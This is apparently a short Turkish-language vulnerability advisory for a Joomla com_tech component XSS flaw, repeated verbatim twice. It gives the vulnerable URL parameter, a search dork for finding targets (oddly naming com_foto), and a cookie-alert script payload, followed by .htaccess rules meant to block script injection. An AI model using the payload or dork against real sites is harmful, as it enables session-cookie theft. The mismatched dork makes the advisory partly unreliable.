endLesS
Webmaster
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################
# Author : [qrusher-] ~ Bug Researchers
# Date : 07.08.2011
# Name : Joomla com_tech
# Bug Type : XSS
# Infection : Bilgi erişimi sağlanılabilir.
# Example Vuln :
[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]
[+] Dork:inurl: com_foto
[+] Demo: http://site/index.php?option=com_tech&task=
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
Pek çok alternatif mevcut ama .htaccess dosyasını biraz düzenlersek sorun ortadan kalacaktır.
< -- bug code start -- >
.htaccess Dosyasının içine aşşağıdaki kodu yazın ve böylece sitenize yapılan herhangi bir XSS
saldırısında siteniz hata verecektir.
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
< -- bug code end of -- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################
# Author : [qrusher-] ~ Bug Researchers
# Date : 07.08.2011
# Name : Joomla com_tech
# Bug Type : XSS
# Infection : Bilgi erişimi sağlanılabilir.
# Example Vuln :
[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]
[+] Dork:inurl: com_foto
[+] Demo: http://site/index.php?option=com_tech&task=
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
Pek çok alternatif mevcut ama .htaccess dosyasını biraz düzenlersek sorun ortadan kalacaktır.
< -- bug code start -- >
.htaccess Dosyasının içine aşşağıdaki kodu yazın ve böylece sitenize yapılan herhangi bir XSS
saldırısında siteniz hata verecektir.
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
< -- bug code end of -- >